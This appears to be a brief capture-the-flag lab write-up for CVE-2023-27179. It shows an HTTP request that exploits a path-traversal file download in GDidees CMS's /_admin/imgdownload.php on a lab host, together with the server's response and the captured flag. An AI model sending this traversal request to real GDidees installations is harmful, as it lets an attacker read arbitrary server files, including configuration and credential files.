CVE-2023-27179

信息

Tags

• GDidees CMS

官方数据库记录

GDidees CMS v3.9.1 及更低版本被发现包含通过 /_admin/imgdownload.php 处的文件名参数下载任意文件的漏洞。

root@jmt-projekt:~# http http://eci-2ze18bprdg5ymu9xzww7.cloudeci1.ichunqiu.com/_admin/imgdownload.php?filename=../../../../../../flag
HTTP/1.1 200 OK
Cache-Control: must-revalidate, post-check=0, pre-check=0, public
Connection: keep-alive
Content-Disposition: attachment; filename="flag.png"
Content-Length: 42
Content-Transfer-Encoding: $type\n
Content-Type: application/force-download
Date: Tue, 23 Jul 2024 15:57:00 GMT
Expires: 0
Pragma: no-cache
X-Powered-By: PHP/7.3.33

flag{27daaa6f-9770-4084-8fbe-b02a5a8d451a}